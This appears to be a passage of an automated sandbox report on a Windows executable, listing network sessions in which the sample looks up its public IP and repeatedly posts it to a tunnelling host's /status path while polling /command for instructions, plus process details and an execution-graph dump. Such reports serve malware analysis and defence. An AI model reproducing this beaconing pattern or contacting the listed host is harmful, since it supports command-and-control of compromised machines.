              Host: pepwuecibr.eu.loclx.io
              Connection: close
              Dec 11, 2024 11:30:24.282865047 CET1236INHTTP/1.0 404 Not FoundContent-Type: text/html<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 TUNNEL NOT FOUND</title><link href="https://fonts.googleapis.com/css?family=Nunito:700,900" rel="stylesheet"></head><style>* { -webkit-box-sizing: border-box; box-sizing: border-box;}body { padding: 0; margin: 0;}#error { position: relative; height: 100vh; background-image: linear-gradient(#0b1326 50%, #0e1931 90%);}#error .error { position: absolute; left: 50%; top: 50%; -webkit-transform: translate(-50%, -50%); -ms-transform: translate(-50%, -50%); transform: translate(-50%, -50%);}.error { max-width: 767px; width: 100%; line-height: 1.4; text-align: center;}.error .error-msg { position: relative; margin-bottom: 20px; z-index: -1;}.error .error-msg h1 { font-family: 'Nunito', sans-s [TRUNCATED]
              Data Raw:
              Data Ascii:
              Dec 11, 2024 11:30:24.282900095 CET848INData Raw: 6e 74 2d 77 65 69 67 68 74 3a 20 39 30 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 31 32 70 78 3b 0a 20 20 63
              Data Ascii: nt-weight: 900; margin-top: 0px; margin-bottom: 0px; margin-left: -12px; color: #E23E57;text-shadow: 3px 3px #ffffff; text-transform: uppercase; letter-spacing: -20px;}.error .error-msg h2 { font-family: 'Nunito', sans-serif;


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              30192.168.2.549902172.67.74.152801488C:\Users\user\Desktop\jgbC220X2U.exe
              TimestampBytes transferredDirectionData
              Dec 11, 2024 11:30:29.431309938 CET115OUTGET /?format=text HTTP/1.1
              User-Agent: cpp-httplib/0.18.0
              Accept: */*
              Host: api.ipify.org
              Connection: close
              Dec 11, 2024 11:30:30.531320095 CET425INHTTP/1.1 200 OK
              Date: Wed, 11 Dec 2024 10:30:30 GMT
              Content-Type: text/plain
              Content-Length: 12
              Connection: close
              Vary: Origin
              CF-Cache-Status: DYNAMIC
              Server: cloudflare
              CF-RAY: 8f04ccb7b8c44213-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1736&min_rtt=1736&rtt_var=868&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=115&delivery_rate=0&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 37 35
              Data Ascii: 8.46.123.175


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              31192.168.2.549904167.99.38.229801488C:\Users\user\Desktop\jgbC220X2U.exe
              TimestampBytes transferredDirectionData
              Dec 11, 2024 11:30:30.653955936 CET171OUTPOST /status HTTP/1.1
              Content-Length: 39
              User-Agent: cpp-httplib/0.18.0
              Accept: */*
              Host: pepwuecibr.eu.loclx.io
              Connection: close
              Content-Type: application/json
              Dec 11, 2024 11:30:30.773682117 CET39OUTData Raw: 7b 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 37 35 22 2c 20 22 6f 73 22 3a 20 22 57 69 6e 64 6f 77 73 22 7d
              Data Ascii: {"ip": "8.46.123.175", "os": "Windows"}
              Dec 11, 2024 11:30:31.897289991 CET1236INHTTP/1.0 404 Not FoundContent-Type: text/html<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 TUNNEL NOT FOUND</title><link href="https://fonts.googleapis.com/css?family=Nunito:700,900" rel="stylesheet"></head><style>* { -webkit-box-sizing: border-box; box-sizing: border-box;}body { padding: 0; margin: 0;}#error { position: relative; height: 100vh; background-image: linear-gradient(#0b1326 50%, #0e1931 90%);}#error .error { position: absolute; left: 50%; top: 50%; -webkit-transform: translate(-50%, -50%); -ms-transform: translate(-50%, -50%); transform: translate(-50%, -50%);}.error { max-width: 767px; width: 100%; line-height: 1.4; text-align: center;}.error .error-msg { position: relative; margin-bottom: 20px; z-index: -1;}.error .error-msg h1 { font-family: 'Nunito', sans-s [TRUNCATED]
              Data Raw:
              Data Ascii:
              Dec 11, 2024 11:30:31.897699118 CET848INData Raw: 6e 74 2d 77 65 69 67 68 74 3a 20 39 30 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 31 32 70 78 3b 0a 20 20 63
              Data Ascii: nt-weight: 900; margin-top: 0px; margin-bottom: 0px; margin-left: -12px; color: #E23E57;text-shadow: 3px 3px #ffffff; text-transform: uppercase; letter-spacing: -20px;}.error .error-msg h2 { font-family: 'Nunito', sans-serif;


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              32192.168.2.549909167.99.38.229801488C:\Users\user\Desktop\jgbC220X2U.exe
              TimestampBytes transferredDirectionData
              Dec 11, 2024 11:30:32.068770885 CET119OUTGET /command HTTP/1.1
              User-Agent: cpp-httplib/0.18.0
              Accept: */*
              Host: pepwuecibr.eu.loclx.io
              Connection: close
              Dec 11, 2024 11:30:33.307296991 CET1236INHTTP/1.0 404 Not FoundContent-Type: text/html<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 TUNNEL NOT FOUND</title><link href="https://fonts.googleapis.com/css?family=Nunito:700,900" rel="stylesheet"></head><style>* { -webkit-box-sizing: border-box; box-sizing: border-box;}body { padding: 0; margin: 0;}#error { position: relative; height: 100vh; background-image: linear-gradient(#0b1326 50%, #0e1931 90%);}#error .error { position: absolute; left: 50%; top: 50%; -webkit-transform: translate(-50%, -50%); -ms-transform: translate(-50%, -50%); transform: translate(-50%, -50%);}.error { max-width: 767px; width: 100%; line-height: 1.4; text-align: center;}.error .error-msg { position: relative; margin-bottom: 20px; z-index: -1;}.error .error-msg h1 { font-family: 'Nunito', sans-s [TRUNCATED]
              Data Raw:
              Data Ascii:
              Dec 11, 2024 11:30:33.307348013 CET848INData Raw: 6e 74 2d 77 65 69 67 68 74 3a 20 39 30 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 31 32 70 78 3b 0a 20 20 63
              Data Ascii: nt-weight: 900; margin-top: 0px; margin-bottom: 0px; margin-left: -12px; color: #E23E57;text-shadow: 3px 3px #ffffff; text-transform: uppercase; letter-spacing: -20px;}.error .error-msg h2 { font-family: 'Nunito', sans-serif;


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              33192.168.2.549925104.26.12.205801488C:\Users\user\Desktop\jgbC220X2U.exe
              TimestampBytes transferredDirectionData
              Dec 11, 2024 11:30:38.573635101 CET115OUTGET /?format=text HTTP/1.1
              User-Agent: cpp-httplib/0.18.0
              Accept: */*
              Host: api.ipify.org
              Connection: close
              Dec 11, 2024 11:30:39.670970917 CET425INHTTP/1.1 200 OK
              Date: Wed, 11 Dec 2024 10:30:39 GMT
              Content-Type: text/plain
              Content-Length: 12
              Connection: close
              Vary: Origin
              CF-Cache-Status: DYNAMIC
              Server: cloudflare
              CF-RAY: 8f04ccf0dd73c42c-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1510&min_rtt=1510&rtt_var=755&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=115&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 37 35
              Data Ascii: 8.46.123.175


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              34192.168.2.549927167.99.38.229801488C:\Users\user\Desktop\jgbC220X2U.exe
              TimestampBytes transferredDirectionData
              Dec 11, 2024 11:30:39.796000004 CET171OUTPOST /status HTTP/1.1
              Content-Length: 39
              User-Agent: cpp-httplib/0.18.0
              Accept: */*
              Host: pepwuecibr.eu.loclx.io
              Connection: close
              Content-Type: application/json
              Dec 11, 2024 11:30:40.143383980 CET210OUTPOST /status HTTP/1.1
              Content-Length: 39
              User-Agent: cpp-httplib/0.18.0
              Accept: */*
              Host: pepwuecibr.eu.loclx.io
              Connection: close
              Content-Type: application/json
              Data Raw: 7b 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 37 35 22 2c 20 22 6f 73 22 3a 20 22 57 69 6e 64 6f 77 73 22 7d
              Data Ascii: {"ip": "8.46.123.175", "os": "Windows"}
              Dec 11, 2024 11:30:40.301363945 CET39OUTData Raw: 7b 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 37 35 22 2c 20 22 6f 73 22 3a 20 22 57 69 6e 64 6f 77 73 22 7d
              Data Ascii: {"ip": "8.46.123.175", "os": "Windows"}
              Dec 11, 2024 11:30:41.419112921 CET1236INHTTP/1.0 404 Not FoundContent-Type: text/html<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 TUNNEL NOT FOUND</title><link href="https://fonts.googleapis.com/css?family=Nunito:700,900" rel="stylesheet"></head><style>* { -webkit-box-sizing: border-box; box-sizing: border-box;}body { padding: 0; margin: 0;}#error { position: relative; height: 100vh; background-image: linear-gradient(#0b1326 50%, #0e1931 90%);}#error .error { position: absolute; left: 50%; top: 50%; -webkit-transform: translate(-50%, -50%); -ms-transform: translate(-50%, -50%); transform: translate(-50%, -50%);}.error { max-width: 767px; width: 100%; line-height: 1.4; text-align: center;}.error .error-msg { position: relative; margin-bottom: 20px; z-index: -1;}.error .error-msg h1 { font-family: 'Nunito', sans-s [TRUNCATED]
              Data Raw:
              Data Ascii:
              Dec 11, 2024 11:30:41.419150114 CET848INData Raw: 6e 74 2d 77 65 69 67 68 74 3a 20 39 30 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 31 32 70 78 3b 0a 20 20 63
              Data Ascii: nt-weight: 900; margin-top: 0px; margin-bottom: 0px; margin-left: -12px; color: #E23E57;text-shadow: 3px 3px #ffffff; text-transform: uppercase; letter-spacing: -20px;}.error .error-msg h2 { font-family: 'Nunito', sans-serif;


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              35192.168.2.549933167.99.38.229801488C:\Users\user\Desktop\jgbC220X2U.exe
              TimestampBytes transferredDirectionData
              Dec 11, 2024 11:30:41.549937010 CET119OUTGET /command HTTP/1.1
              User-Agent: cpp-httplib/0.18.0
              Accept: */*
              Host: pepwuecibr.eu.loclx.io
              Connection: close
              Dec 11, 2024 11:30:42.778872013 CET1236INHTTP/1.0 404 Not FoundContent-Type: text/html<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 TUNNEL NOT FOUND</title><link href="https://fonts.googleapis.com/css?family=Nunito:700,900" rel="stylesheet"></head><style>* { -webkit-box-sizing: border-box; box-sizing: border-box;}body { padding: 0; margin: 0;}#error { position: relative; height: 100vh; background-image: linear-gradient(#0b1326 50%, #0e1931 90%);}#error .error { position: absolute; left: 50%; top: 50%; -webkit-transform: translate(-50%, -50%); -ms-transform: translate(-50%, -50%); transform: translate(-50%, -50%);}.error { max-width: 767px; width: 100%; line-height: 1.4; text-align: center;}.error .error-msg { position: relative; margin-bottom: 20px; z-index: -1;}.error .error-msg h1 { font-family: 'Nunito', sans-s [TRUNCATED]
              Data Raw:
              Data Ascii:
              Dec 11, 2024 11:30:42.778956890 CET848INData Raw: 6e 74 2d 77 65 69 67 68 74 3a 20 39 30 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 31 32 70 78 3b 0a 20 20 63
              Data Ascii: nt-weight: 900; margin-top: 0px; margin-bottom: 0px; margin-left: -12px; color: #E23E57;text-shadow: 3px 3px #ffffff; text-transform: uppercase; letter-spacing: -20px;}.error .error-msg h2 { font-family: 'Nunito', sans-serif;


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              36192.168.2.549948104.26.12.205801488C:\Users\user\Desktop\jgbC220X2U.exe
              TimestampBytes transferredDirectionData
              Dec 11, 2024 11:30:47.905708075 CET115OUTGET /?format=text HTTP/1.1
              User-Agent: cpp-httplib/0.18.0
              Accept: */*
              Host: api.ipify.org
              Connection: close
              Dec 11, 2024 11:30:48.996546984 CET425INHTTP/1.1 200 OK
              Date: Wed, 11 Dec 2024 10:30:48 GMT
              Content-Type: text/plain
              Content-Length: 12
              Connection: close
              Vary: Origin
              CF-Cache-Status: DYNAMIC
              Server: cloudflare
              CF-RAY: 8f04cd2b3e20de99-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1459&min_rtt=1459&rtt_var=729&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=115&delivery_rate=0&cwnd=184&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 37 35
              Data Ascii: 8.46.123.175


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              37192.168.2.549950167.99.38.229801488C:\Users\user\Desktop\jgbC220X2U.exe
              TimestampBytes transferredDirectionData
              Dec 11, 2024 11:30:49.118223906 CET171OUTPOST /status HTTP/1.1
              Content-Length: 39
              User-Agent: cpp-httplib/0.18.0
              Accept: */*
              Host: pepwuecibr.eu.loclx.io
              Connection: close
              Content-Type: application/json
              Dec 11, 2024 11:30:49.238981962 CET39OUTData Raw: 7b 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 37 35 22 2c 20 22 6f 73 22 3a 20 22 57 69 6e 64 6f 77 73 22 7d
              Data Ascii: {"ip": "8.46.123.175", "os": "Windows"}
              Dec 11, 2024 11:30:50.358416080 CET1236INHTTP/1.0 404 Not FoundContent-Type: text/html<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 TUNNEL NOT FOUND</title><link href="https://fonts.googleapis.com/css?family=Nunito:700,900" rel="stylesheet"></head><style>* { -webkit-box-sizing: border-box; box-sizing: border-box;}body { padding: 0; margin: 0;}#error { position: relative; height: 100vh; background-image: linear-gradient(#0b1326 50%, #0e1931 90%);}#error .error { position: absolute; left: 50%; top: 50%; -webkit-transform: translate(-50%, -50%); -ms-transform: translate(-50%, -50%); transform: translate(-50%, -50%);}.error { max-width: 767px; width: 100%; line-height: 1.4; text-align: center;}.error .error-msg { position: relative; margin-bottom: 20px; z-index: -1;}.error .error-msg h1 { font-family: 'Nunito', sans-s [TRUNCATED]
              Data Raw:
              Data Ascii:
              Dec 11, 2024 11:30:50.358472109 CET848INData Raw: 6e 74 2d 77 65 69 67 68 74 3a 20 39 30 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 31 32 70 78 3b 0a 20 20 63
              Data Ascii: nt-weight: 900; margin-top: 0px; margin-bottom: 0px; margin-left: -12px; color: #E23E57;text-shadow: 3px 3px #ffffff; text-transform: uppercase; letter-spacing: -20px;}.error .error-msg h2 { font-family: 'Nunito', sans-serif;


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              38192.168.2.549956167.99.38.229801488C:\Users\user\Desktop\jgbC220X2U.exe
              TimestampBytes transferredDirectionData
              Dec 11, 2024 11:30:50.480128050 CET119OUTGET /command HTTP/1.1
              User-Agent: cpp-httplib/0.18.0
              Accept: */*
              Host: pepwuecibr.eu.loclx.io
              Connection: close
              Dec 11, 2024 11:30:51.724663973 CET1236INHTTP/1.0 404 Not FoundContent-Type: text/html<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 TUNNEL NOT FOUND</title><link href="https://fonts.googleapis.com/css?family=Nunito:700,900" rel="stylesheet"></head><style>* { -webkit-box-sizing: border-box; box-sizing: border-box;}body { padding: 0; margin: 0;}#error { position: relative; height: 100vh; background-image: linear-gradient(#0b1326 50%, #0e1931 90%);}#error .error { position: absolute; left: 50%; top: 50%; -webkit-transform: translate(-50%, -50%); -ms-transform: translate(-50%, -50%); transform: translate(-50%, -50%);}.error { max-width: 767px; width: 100%; line-height: 1.4; text-align: center;}.error .error-msg { position: relative; margin-bottom: 20px; z-index: -1;}.error .error-msg h1 { font-family: 'Nunito', sans-s [TRUNCATED]
              Data Raw:
              Data Ascii:
              Dec 11, 2024 11:30:51.724770069 CET848INData Raw: 6e 74 2d 77 65 69 67 68 74 3a 20 39 30 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 31 32 70 78 3b 0a 20 20 63
              Data Ascii: nt-weight: 900; margin-top: 0px; margin-bottom: 0px; margin-left: -12px; color: #E23E57;text-shadow: 3px 3px #ffffff; text-transform: uppercase; letter-spacing: -20px;}.error .error-msg h2 { font-family: 'Nunito', sans-serif;


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              39192.168.2.549971104.26.12.205801488C:\Users\user\Desktop\jgbC220X2U.exe
              TimestampBytes transferredDirectionData
              Dec 11, 2024 11:30:56.858113050 CET115OUTGET /?format=text HTTP/1.1
              User-Agent: cpp-httplib/0.18.0
              Accept: */*
              Host: api.ipify.org
              Connection: close
              Dec 11, 2024 11:30:57.964129925 CET425INHTTP/1.1 200 OK
              Date: Wed, 11 Dec 2024 10:30:57 GMT
              Content-Type: text/plain
              Content-Length: 12
              Connection: close
              Vary: Origin
              CF-Cache-Status: DYNAMIC
              Server: cloudflare
              CF-RAY: 8f04cd6328f443a5-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1757&min_rtt=1757&rtt_var=878&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=115&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 37 35
              Data Ascii: 8.46.123.175


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              40192.168.2.549976167.99.38.229801488C:\Users\user\Desktop\jgbC220X2U.exe
              TimestampBytes transferredDirectionData
              Dec 11, 2024 11:30:58.096885920 CET171OUTPOST /status HTTP/1.1
              Content-Length: 39
              User-Agent: cpp-httplib/0.18.0
              Accept: */*
              Host: pepwuecibr.eu.loclx.io
              Connection: close
              Content-Type: application/json
              Dec 11, 2024 11:30:58.216407061 CET39OUTData Raw: 7b 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 37 35 22 2c 20 22 6f 73 22 3a 20 22 57 69 6e 64 6f 77 73 22 7d
              Data Ascii: {"ip": "8.46.123.175", "os": "Windows"}
              Dec 11, 2024 11:30:59.324276924 CET1236INHTTP/1.0 404 Not FoundContent-Type: text/html<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 TUNNEL NOT FOUND</title><link href="https://fonts.googleapis.com/css?family=Nunito:700,900" rel="stylesheet"></head><style>* { -webkit-box-sizing: border-box; box-sizing: border-box;}body { padding: 0; margin: 0;}#error { position: relative; height: 100vh; background-image: linear-gradient(#0b1326 50%, #0e1931 90%);}#error .error { position: absolute; left: 50%; top: 50%; -webkit-transform: translate(-50%, -50%); -ms-transform: translate(-50%, -50%); transform: translate(-50%, -50%);}.error { max-width: 767px; width: 100%; line-height: 1.4; text-align: center;}.error .error-msg { position: relative; margin-bottom: 20px; z-index: -1;}.error .error-msg h1 { font-family: 'Nunito', sans-s [TRUNCATED]
              Data Raw:
              Data Ascii:
              Dec 11, 2024 11:30:59.324404001 CET848INData Raw: 6e 74 2d 77 65 69 67 68 74 3a 20 39 30 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 31 32 70 78 3b 0a 20 20 63
              Data Ascii: nt-weight: 900; margin-top: 0px; margin-bottom: 0px; margin-left: -12px; color: #E23E57;text-shadow: 3px 3px #ffffff; text-transform: uppercase; letter-spacing: -20px;}.error .error-msg h2 { font-family: 'Nunito', sans-serif;


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              41192.168.2.549978167.99.38.229801488C:\Users\user\Desktop\jgbC220X2U.exe
              TimestampBytes transferredDirectionData
              Dec 11, 2024 11:30:59.446290970 CET119OUTGET /command HTTP/1.1
              User-Agent: cpp-httplib/0.18.0
              Accept: */*
              Host: pepwuecibr.eu.loclx.io
              Connection: close
              Dec 11, 2024 11:31:00.681830883 CET1236INHTTP/1.0 404 Not FoundContent-Type: text/html<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 TUNNEL NOT FOUND</title><link href="https://fonts.googleapis.com/css?family=Nunito:700,900" rel="stylesheet"></head><style>* { -webkit-box-sizing: border-box; box-sizing: border-box;}body { padding: 0; margin: 0;}#error { position: relative; height: 100vh; background-image: linear-gradient(#0b1326 50%, #0e1931 90%);}#error .error { position: absolute; left: 50%; top: 50%; -webkit-transform: translate(-50%, -50%); -ms-transform: translate(-50%, -50%); transform: translate(-50%, -50%);}.error { max-width: 767px; width: 100%; line-height: 1.4; text-align: center;}.error .error-msg { position: relative; margin-bottom: 20px; z-index: -1;}.error .error-msg h1 { font-family: 'Nunito', sans-s [TRUNCATED]
              Data Raw:
              Data Ascii:
              Dec 11, 2024 11:31:00.681922913 CET848INData Raw: 6e 74 2d 77 65 69 67 68 74 3a 20 39 30 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 31 32 70 78 3b 0a 20 20 63
              Data Ascii: nt-weight: 900; margin-top: 0px; margin-bottom: 0px; margin-left: -12px; color: #E23E57;text-shadow: 3px 3px #ffffff; text-transform: uppercase; letter-spacing: -20px;}.error .error-msg h2 { font-family: 'Nunito', sans-serif;


              Click to jump to process

              Click to jump to process

              Click to dive into process behavior distribution

              Click to jump to process

              Target ID:0
              Start time:05:28:57
              Start date:11/12/2024
              Path:C:\Users\user\Desktop\jgbC220X2U.exe
              Wow64 process (32bit):false
              Commandline:"C:\Users\user\Desktop\jgbC220X2U.exe"
              Imagebase:0x7ff729f80000
              File size:7'131'898 bytes
              MD5 hash:28354F3E0D66D054BF0D05C3CAF1E28A
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:low
              Has exited:false

              Target ID:1
              Start time:05:28:57
              Start date:11/12/2024
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff6d64d0000
              File size:862'208 bytes
              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:false

              Reset < >

                Execution Graph

                Execution Coverage:3.1%
                Dynamic/Decrypted Code Coverage:0%
                Signature Coverage:2.7%
                Total number of Nodes:659
                Total number of Limit Nodes:13
                execution_graph 148012 7ff72a0220c0 148019 7ff72a022800 148012->148019 148015 7ff72a022139 148016 7ff72a0220fc 148016->148015 148024 7ff72a0a8950 82 API calls 148016->148024 148020 7ff72a02282c 148019->148020 148021 7ff72a0220dc 148019->148021 148020->148021 148025 7ff72a0222a0 82 API calls 148020->148025 148021->148016 148023 7ff72a0a8950 82 API calls 148021->148023 148023->148016 148024->148015 148025->148021 148026 7ff729f81125 148029 7ff729f81154 148026->148029 148030 7ff729f8118b 148029->148030 148031 7ff729f811fd 148030->148031 148032 7ff729f811f1 148030->148032 148033 7ff729f8120a _initterm 148031->148033 148034 7ff729f811fb 148031->148034 148078 7ff729f98100 __stdio_common_vfprintf __acrt_iob_func 148032->148078 148033->148034 148036 7ff729f8124a _initterm 148034->148036 148037 7ff729f81270 148034->148037 148036->148037 148050 7ff729f8ca18 148037->148050 148039 7ff729f812c4 _set_invalid_parameter_handler 148041 7ff729f812f5 148039->148041 148054 7ff729f8147c 148041->148054 148043 7ff729f81309 148059 7ff729f81c19 148043->148059 148051 7ff729f8ca2e 148050->148051 148053 7ff729f8caaf 148050->148053 148079 7ff729f8c68e __acrt_iob_func 148051->148079 148053->148039 148055 7ff729f814a2 148054->148055 148056 7ff729f814bd 148055->148056 148057 7ff729f81555 148055->148057 148058 7ff729f814dc malloc memcpy 148056->148058 148057->148043 148058->148055 148060 7ff729f81c2f 148059->148060 148080 7ff72a075680 148060->148080 148068 7ff72a0bc1f0 74 API calls 148077 7ff729f81c6c 148068->148077 148070 7ff72a0bb840 84 API calls 148070->148077 148071 7ff72a075680 70 API calls 148071->148077 148074 7ff729faa1f0 54 API calls 148074->148077 148077->148068 148077->148070 148077->148071 148077->148074 148092 7ff729f81a17 148077->148092 148108 7ff729f81991 148077->148108 148111 7ff72a0bc3d0 148077->148111 148117 7ff72a0bc240 148077->148117 148120 7ff729fa9c10 148077->148120 148124 7ff729fa9bd0 148077->148124 148128 7ff729faa220 54 API calls 148077->148128 148129 7ff72a0bb500 148077->148129 148133 7ff72a02f090 27 API calls 148077->148133 148078->148034 148079->148053 148081 7ff72a0756a8 148080->148081 148082 7ff72a0756d0 148081->148082 148142 7ff72a0c65d0 69 API calls 148081->148142 148134 7ff72a02e8d0 148082->148134 148085 7ff72a0756dc 148138 7ff72a072200 148085->148138 148087 7ff729f81c5c 148088 7ff729fa9c70 148087->148088 148089 7ff729fa9c8f 148088->148089 148148 7ff729fa9d10 148089->148148 148091 7ff729fa9cb9 148091->148077 148093 7ff72a075680 70 API calls 148092->148093 148094 7ff729f81a50 148093->148094 148095 7ff729fa9c70 178 API calls 148094->148095 148096 7ff729f81a60 148095->148096 148097 7ff72a075680 70 API calls 148096->148097 148098 7ff729f81a9d 148097->148098 148099 7ff729fa9bd0 213 API calls 148098->148099 148100 7ff729f81ab7 148099->148100 148101 7ff729f81b0c 148100->148101 148102 7ff729f81b30 148100->148102 148810 7ff72a075120 148101->148810 148103 7ff72a075680 70 API calls 148102->148103 148105 7ff729f81b2e 148103->148105 148805 7ff729faa1f0 148105->148805 148107 7ff729f81b70 148107->148077 148109 7ff72a075680 70 API calls 148108->148109 148110 7ff729f819c4 148109->148110 148110->148077 148112 7ff72a0bc3f8 148111->148112 148113 7ff72a02e8d0 strlen 148112->148113 148114 7ff72a0bc422 148113->148114 148872 7ff72a0ad1a0 148114->148872 148116 7ff72a0bc446 148116->148077 148898 7ff72a0735e0 148117->148898 148119 7ff72a0bc264 148119->148077 148121 7ff729fa9c34 148120->148121 148932 7ff729fa7fa0 148121->148932 148125 7ff729fa9bf0 148124->148125 149118 7ff729fa7c50 148125->149118 148127 7ff729fa9c06 148127->148077 148128->148077 148130 7ff72a0bb51f 148129->148130 148131 7ff72a02e8d0 strlen 148130->148131 148132 7ff72a0bb52e 148131->148132 148132->148077 148133->148077 148135 7ff72a02e8e1 148134->148135 148136 7ff72a02e8f3 strlen 148135->148136 148137 7ff72a02e8e5 148135->148137 148136->148137 148137->148085 148139 7ff72a07224c 148138->148139 148141 7ff72a072262 148138->148141 148143 7ff72a074b40 148139->148143 148141->148087 148144 7ff72a074b56 148143->148144 148147 7ff72a0c66c0 69 API calls 148144->148147 148149 7ff729fa9d4d 148148->148149 148150 7ff729fa9db7 148149->148150 148190 7ff72a0c4930 148149->148190 148255 7ff72a0ac4e0 148150->148255 148156 7ff729fa9d99 148259 7ff72a0c4a30 84 API calls 148156->148259 148157 7ff729faa02d 148274 7ff729fae4b0 117 API calls 148157->148274 148158 7ff729fa9deb 148260 7ff729fe9a50 69 API calls 148158->148260 148162 7ff729fa9e0b 148163 7ff729fa9e31 148162->148163 148261 7ff72a0bc0b0 strlen 148162->148261 148165 7ff729fa9e45 148163->148165 148166 7ff729fa9eb7 148163->148166 148168 